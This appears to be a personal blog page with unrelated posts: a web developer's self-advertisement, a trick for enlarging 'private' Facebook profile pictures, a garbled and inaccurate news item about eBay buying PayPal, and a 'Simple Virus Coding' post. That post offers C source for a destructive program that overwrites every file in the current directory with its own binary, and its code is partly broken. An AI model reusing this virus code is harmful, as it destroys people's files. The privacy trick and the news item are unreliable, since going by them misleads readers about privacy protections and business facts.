want to create a website ?

Want to create a Website ?

Full Stack Web Developer, curious about making large project as well as small projects, any problem should be solved when it comes to a web development for me it's always easy to implement the require logic rather than complex logic. Expertise in Angular js, PHP, MySql, Various Payment Gateway, PDF | Excel Generator, Domain and Hosting, Animation, Bootstrap, CSS3, HTML5, Responsive Design. 3 years of sharp experience in web development easy to understand user problem or their requirements at their budget(price).people should go with uniqueness and creative works so here it's challenging part for the developer and that's what i like about being problem solver at each and every point. HIRE ME AND GET THINGS DONE ON YOUR TIME. Contact me for Portfolio.

Immense knowledge about web development, domain, hosting and SSL and let's boost your business 100x faster than ever.





Direct contact me via :
1) Comment your e-mail in this post, i will contact you soon
2) Mail me on kishansonagra07@gmail.com , let me understand you idea & make it real with ongoing web-technology.

Working on several projects like :
1) Renting
2) e-commerce
3) Social Network
4) Coupon & Review System
5) Worker & Merchant Management
6) Review and Earn
7) Informative website
8) CRM
9) Tracking System
10) Guest Portal
11) PMS for business management





How to view Facebook Private Photos?

     Plenty of time my friend's say me, Bro how to see/view facebook profile picture which has been private and we can't zoom it...So, today i am say you how to face it...

Step-1:- Open the facebook profile picture which you want to see it in large size...

Step-2:-Than Right Click of Profile Picture And click on "Copy Image URL" than following step-3...





Step-3:-Than Paste this URL into New Tab of  the Browser with the help of  " CTRL+V "....

Step-4:-Now this is most important part of this topic Change the size of picture which you see in URL  it like a:-s160 X 160 than it change it to s720 X 720 otherwise change the value whatever you like to see....


Thanks for your time

ebay agree to buy PayPal in $800 Million




                               "In I.T. field this month we get a lot of news and lot of DEAL to each other company..."

   After Micorosoft buying Nokia Phones company in 5.44 billion euros , Fairfax Financial buying BalckBerry Smart Phones company in $4.7 billion...





    and now day's ebay agree to buy PayPal Company in $800  million in cash...

ebay is also provides those service which PayPal is provided and also PayPal is shaking up with ebay and a big  DEAL with in it and finally this deal is expected to closeing end of the year...





SIMPLE VIRUS CODING

Please This Trick Try to "C" Language
/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......






#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_R
DONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}


Please share like &  do comment